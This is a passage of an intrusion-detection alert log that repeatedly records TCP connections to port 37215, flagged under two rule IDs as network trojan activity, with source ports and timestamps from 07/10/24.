                  Source Port:44568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2829579
                  Source Port:48586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.962795
                  SID:2835222
                  Source Port:42520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.102138
                  SID:2829579
                  Source Port:41510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.846207
                  SID:2835222
                  Source Port:53636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.912499
                  SID:2829579
                  Source Port:52654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536495
                  SID:2835222
                  Source Port:58906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.674109
                  SID:2829579
                  Source Port:49462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.220908
                  SID:2829579
                  Source Port:47308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.045134
                  SID:2829579
                  Source Port:50280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.851748
                  SID:2829579
                  Source Port:32860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.831965
                  SID:2835222
                  Source Port:52540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.019730
                  SID:2829579
                  Source Port:43446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.823605
                  SID:2835222
                  Source Port:36984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.128635
                  SID:2835222
                  Source Port:60854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.841879
                  SID:2835222
                  Source Port:38196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.023447
                  SID:2835222
                  Source Port:54000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.708629
                  SID:2835222
                  Source Port:60968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.831762
                  SID:2829579
                  Source Port:40932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.850737
                  SID:2829579
                  Source Port:51636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.755286
                  SID:2829579
                  Source Port:33648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234468
                  SID:2835222
                  Source Port:54928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702114
                  SID:2835222
                  Source Port:46396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.864368
                  SID:2835222
                  Source Port:47198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.512534
                  SID:2835222
                  Source Port:35704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.773956
                  SID:2835222
                  Source Port:51640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.957871
                  SID:2835222
                  Source Port:53560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881781
                  SID:2835222
                  Source Port:42934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.236926
                  SID:2835222
                  Source Port:41422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.632458
                  SID:2829579
                  Source Port:48890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.861640
                  SID:2835222
                  Source Port:50912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.558138
                  SID:2835222
                  Source Port:44944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.092511
                  SID:2835222
                  Source Port:60922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.716431
                  SID:2835222
                  Source Port:48896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.179313
                  SID:2835222
                  Source Port:37964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.859325
                  SID:2835222
                  Source Port:59930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.645443
                  SID:2829579
                  Source Port:55980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.552344
                  SID:2829579
                  Source Port:54558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.952619
                  SID:2835222
                  Source Port:46864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.435309
                  SID:2829579
                  Source Port:53886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564471
                  SID:2835222
                  Source Port:33632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.113907
                  SID:2835222
                  Source Port:46620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.962148
                  SID:2829579
                  Source Port:47020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.580773
                  SID:2835222
                  Source Port:38924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.481124
                  SID:2829579
                  Source Port:44814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.815907
                  SID:2835222
                  Source Port:60388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.335280
                  SID:2835222
                  Source Port:47846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.239494
                  SID:2835222
                  Source Port:35842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.614287
                  SID:2835222
                  Source Port:52872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139469
                  SID:2835222
                  Source Port:49472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.126538
                  SID:2829579
                  Source Port:51008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.586309
                  SID:2835222
                  Source Port:40958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.746677
                  SID:2829579
                  Source Port:48236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.886880
                  SID:2829579
                  Source Port:52270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.128775
                  SID:2835222
                  Source Port:44732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.380145
                  SID:2829579
                  Source Port:57956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2829579
                  Source Port:47444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470816
                  SID:2835222
                  Source Port:51592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.305980
                  SID:2829579
                  Source Port:45158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.611874
                  SID:2835222
                  Source Port:54606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.837904
                  SID:2829579
                  Source Port:39748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.033039
                  SID:2835222
                  Source Port:55160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.610357
                  SID:2835222
                  Source Port:54372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.824394
                  SID:2835222
                  Source Port:35052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949707
                  SID:2835222
                  Source Port:47654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.790493
                  SID:2829579
                  Source Port:33898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.614472
                  SID:2835222
                  Source Port:40610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623389
                  SID:2835222
                  Source Port:33352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.848965
                  SID:2829579
                  Source Port:45638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.041002
                  SID:2829579
                  Source Port:49248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.517439
                  SID:2829579
                  Source Port:33304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.204626
                  SID:2835222
                  Source Port:42902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518117
                  SID:2835222
                  Source Port:41122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.346180
                  SID:2829579
                  Source Port:40378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488674
                  SID:2835222
                  Source Port:44126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.446922
                  SID:2835222
                  Source Port:55358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.763197
                  SID:2829579
                  Source Port:48954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295095
                  SID:2835222
                  Source Port:41044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.927826
                  SID:2829579
                  Source Port:50338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.969982
                  SID:2829579
                  Source Port:59360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.925120
                  SID:2829579
                  Source Port:53842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.417090
                  SID:2835222
                  Source Port:53288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.749438
                  SID:2829579
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.172014
                  SID:2835222
                  Source Port:32794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208199
                  SID:2829579
                  Source Port:35294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.501258
                  SID:2835222
                  Source Port:53344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.374424
                  SID:2829579
                  Source Port:60244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.549357
                  SID:2829579
                  Source Port:58656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.773941
                  SID:2835222
                  Source Port:47326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.967012
                  SID:2835222
                  Source Port:57002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.919508
                  SID:2835222
                  Source Port:35202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.518988
                  SID:2829579
                  Source Port:49140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.956633
                  SID:2829579
                  Source Port:55768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.189377
                  SID:2835222
                  Source Port:45956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.823884
                  SID:2835222
                  Source Port:45862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433528
                  SID:2829579
                  Source Port:60428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.820338
                  SID:2835222
                  Source Port:38370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.425072
                  SID:2829579
                  Source Port:46176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.933430
                  SID:2829579
                  Source Port:46796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.550512
                  SID:2829579
                  Source Port:57760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.273517
                  SID:2829579
                  Source Port:52552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.645835
                  SID:2829579
                  Source Port:47216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739148
                  SID:2835222
                  Source Port:43052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.757034
                  SID:2829579
                  Source Port:41212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.877508
                  SID:2829579
                  Source Port:59078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.943486
                  SID:2835222
                  Source Port:41742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.781419
                  SID:2829579
                  Source Port:51440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.837566
                  SID:2835222
                  Source Port:44496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819807
                  SID:2835222
                  Source Port:39736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.570253
                  SID:2835222
                  Source Port:32896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592193
                  SID:2835222
                  Source Port:50650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.612817
                  SID:2829579
                  Source Port:33996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.186875
                  SID:2835222
                  Source Port:48346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.504435
                  SID:2829579
                  Source Port:52868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.428248
                  SID:2829579
                  Source Port:33474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.543257
                  SID:2835222
                  Source Port:47318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.802521
                  SID:2835222
                  Source Port:39380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.077258
                  SID:2829579
                  Source Port:38700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433410
                  SID:2835222
                  Source Port:45694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449371
                  SID:2829579
                  Source Port:60864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.047442
                  SID:2835222
                  Source Port:37690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.260181
                  SID:2835222
                  Source Port:56582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.442738
                  SID:2835222
                  Source Port:59430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.487311
                  SID:2835222
                  Source Port:38204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.848073
                  SID:2835222
                  Source Port:59568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.883243
                  SID:2829579
                  Source Port:51590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.355278
                  SID:2829579
                  Source Port:47484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.949223
                  SID:2835222
                  Source Port:33026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.221406
                  SID:2829579
                  Source Port:53256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421781
                  SID:2835222
                  Source Port:43554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.073471
                  SID:2835222
                  Source Port:50702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.851731
                  SID:2829579
                  Source Port:39506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.569175
                  SID:2835222
                  Source Port:54376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.270061
                  SID:2835222
                  Source Port:48614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.781725
                  SID:2829579
                  Source Port:50532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905165
                  SID:2829579
                  Source Port:39782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.430084
                  SID:2829579
                  Source Port:45558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2829579
                  Source Port:47236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.865748
                  SID:2835222
                  Source Port:38972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.367813
                  SID:2829579
                  Source Port:36496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.605527
                  SID:2829579
                  Source Port:58622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.094763
                  SID:2835222
                  Source Port:57270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.477490
                  SID:2835222
                  Source Port:51414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.549149
                  SID:2829579
                  Source Port:49458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.207710
                  SID:2829579
                  Source Port:34830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.072546
                  SID:2835222
                  Source Port:60234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.900850
                  SID:2829579
                  Source Port:59084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2829579
                  Source Port:57604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.743815
                  SID:2835222
                  Source Port:46844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.616145
                  SID:2835222
                  Source Port:43964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.792743
                  SID:2829579
                  Source Port:43134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.953333
                  SID:2829579
                  Source Port:58176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.558297
                  SID:2835222
                  Source Port:47110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.675838
                  SID:2835222
                  Source Port:48980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358429
                  SID:2829579
                  Source Port:50204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.749504
                  SID:2829579
                  Source Port:50772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.646157
                  SID:2829579
                  Source Port:52656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.551619
                  SID:2835222
                  Source Port:45626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561915
                  SID:2829579
                  Source Port:51876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132351
                  SID:2835222
                  Source Port:59528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.216046
                  SID:2829579
                  Source Port:41412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.407360
                  SID:2835222
                  Source Port:36836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.165242
                  SID:2835222
                  Source Port:39708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.141493
                  SID:2835222
                  Source Port:37252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.538711
                  SID:2829579
                  Source Port:54314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.172679
                  SID:2829579
                  Source Port:49228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148886
                  SID:2829579
                  Source Port:54546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.297607
                  SID:2829579
                  Source Port:43534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.132992
                  SID:2835222
                  Source Port:55856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857576
                  SID:2835222
                  Source Port:49574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.900850
                  SID:2829579
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.063250
                  SID:2835222
                  Source Port:49764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.922247
                  SID:2835222
                  Source Port:39980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453376
                  SID:2829579
                  Source Port:50144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.142415
                  SID:2835222
                  Source Port:41252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.222748
                  SID:2829579
                  Source Port:53582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603231
                  SID:2829579
                  Source Port:40434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624887
                  SID:2835222
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.675779
                  SID:2835222
                  Source Port:60802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2829579
                  Source Port:46832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415369
                  SID:2829579
                  Source Port:55968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.236089
                  SID:2829579
                  Source Port:51154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2829579
                  Source Port:38650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782000
